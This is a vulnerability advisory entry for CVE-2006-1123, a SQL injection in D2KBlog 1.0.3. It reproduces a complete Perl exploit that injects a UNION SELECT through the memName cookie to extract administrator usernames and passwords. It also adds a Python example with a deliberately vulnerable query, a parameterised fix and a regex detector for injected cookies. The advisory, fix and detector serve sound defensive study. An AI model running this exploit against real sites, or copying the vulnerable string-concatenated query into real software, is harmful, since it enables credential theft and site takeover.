D2KBlog multiple SQL injection vulnerabilities

Vulnerability ID: 1109893    Vulnerability type: SQL injection
Published: 2006-03-09    Updated: 2006-03-10
CVE: CVE-2006-1123    CNNVD-ID: CNNVD-200603-139
Platform: ASP    CVSS score: 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/1569
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-139
|Vulnerability details
D2KBlog 1.0.3 and earlier contain a SQL injection vulnerability: the memName parameter is placed into a SQL statement without sanitisation, so a remote attacker can execute arbitrary SQL commands by supplying a crafted value for it (in the exploit below it is delivered through the site's cookie).
|Exploit
#!/usr/bin/perl -w 
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)

require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print "	KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print "	PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print "	Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";

if (@ARGV != 2)
{
    print "	Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
    print "	ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
    exit ();
}


my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);

my $Path = $ARGV[0];

my $Page = $ARGV[1];

my $URL = "http://".$Path.$Page;

print "|***| Connecting to ".$URL." ...\r\n";

my $r = HTTP::Request->new(GET => $URL."?action=edit");

$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );

my $res = $ua->request($r);

print "|***| Connected !\r\n";

if ($res->is_success) {

	print "|***| Extracting Username and Password ...\r\n\r\n";

	my $results = $res->content; 

	while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }

	print "\r\n	Exploit by Devil_Box\r\n		Discovery by Farhad koosha\r\n\r\n";

} else {
	die "\r\n|***| ".$res->status_line;
}

# milw0rm.com [2006-03-09]
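The defect class behind this advisory, and the fix for it, rebuilt as an added example (this is not code from the page, from D2KBlog or from KAPDA). It uses Python with an in-memory sqlite3 database: one lookup concatenates the cookie-supplied member name into the SQL text the way the vulnerable page does, the other binds it as a parameter; a small parser then pulls memName out of the ASP-style dictionary cookie the exploit sends and flags values that carry injection markers, which is the check a defender would run over proxy or WAF logs. The table and column names (blog_member, mem_name, mem_password, mem_status) are taken from the exploit's payload; the rows, the host name www.example.com, the helper names and the regular expression are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import unquote


# Constructed in-memory stand-in for the blog's member table. Table and
# column names follow the ones visible in the advisory's payload; the rows
# are made up. Clear-text passwords are kept only to mirror what the 2006
# application stored; a real table would hold salted password hashes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE blog_member (mem_name TEXT, mem_password TEXT, mem_status TEXT)"
    )
    conn.executemany(
        "INSERT INTO blog_member VALUES (?, ?, ?)",
        [("admin", "hunter2", "SupAdmin"), ("alice", "s3cret", "Member")],
    )
    return conn


def lookup_member_vulnerable(conn, mem_name):
    """The defect class behind CVE-2006-1123: the cookie-supplied name is
    spliced into the SQL text, so quotes and keywords inside it become SQL.
    Kept only as the 'before' picture; do not use."""
    sql = (
        "SELECT mem_name, mem_status FROM blog_member WHERE mem_name = '"
        + mem_name
        + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_member_safe(conn, mem_name):
    """Hardened form: the value is bound as a parameter, so whatever the
    cookie contains is only ever compared literally against mem_name."""
    sql = "SELECT mem_name, mem_status FROM blog_member WHERE mem_name = ?"
    return conn.execute(sql, (mem_name,)).fetchall()


def member_name_from_cookie(cookie_header, host):
    """Pull memName out of the ASP-style dictionary cookie the exploit uses:
    one cookie named after the host whose value is 'key=val&key=val...'.
    Returns None when the cookie or the sub-key is absent."""
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if not sep or name != host:
            continue
        for sub in value.split("&"):
            key, sub_sep, sub_val = sub.partition("=")
            if sub_sep and key == "memName":
                return unquote(sub_val)
    return None


# Markers that have no business in a member name: a quote followed by a SQL
# keyword, a SQL line comment, or an HTML comment opener (the advisory's
# payload wraps the injected text in '<!--' and '-->'). Assumed heuristic.
_INJECTION_RE = re.compile(r"'\s*(UNION|SELECT|OR|AND)\b|--|<!--", re.IGNORECASE)


def cookie_looks_injected(cookie_header, host):
    """Detection check for proxy or WAF logs: True if the memName sub-key
    carries SQL-injection markers after URL decoding."""
    name = member_name_from_cookie(cookie_header, host)
    return name is not None and bool(_INJECTION_RE.search(name))


if __name__ == "__main__":
    db = make_db()
    # Constructed Cookie headers: one ordinary session and one shaped like
    # the advisory's payload (shortened; the full string is not needed here).
    benign = "www.example.com=memPassword=&memStatus=Member&memName=alice"
    hostile = "www.example.com=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201-->"
    for header in (benign, hostile):
        name = member_name_from_cookie(header, "www.example.com")
        print(repr(name), "flagged:", cookie_looks_injected(header, "www.example.com"))
        print("  parameterised lookup:", lookup_member_safe(db, name))
```

The parameterised query is the actual fix: the member name can never change the shape of the statement, so the UNION in the exploit's cookie simply fails to match any row. The regular expression is a coarse indicator for reviewing logs or tuning a WAF rule, not a substitute for parameterisation, since encoding tricks can slip past any such pattern.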
|References

Source: BUGTRAQ
Name: 20060308 [KAPDA::#32] - d2kBlog 1.0.3 Multiple Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/427103/100/0/threaded
Source: VUPEN
Name: ADV-2006-0896
Link: http://www.frsirt.com/english/advisories/2006/0896
Source: SECUNIA
Name: 19177
Link: http://secunia.com/advisories/19177
Source: XF
Name: d2kblog-memname-sql-injection(25215)
Link: http://xforce.iss.net/xforce/xfdb/25215
Source: BID
Name: 17035
Link: http://www.securityfocus.com/bid/17035
Source: OSVDB
Name: 23770
Link: http://www.osvdb.org/23770
Source: SREASON
Name: 559
Link: http://securityreason.com/securityalert/559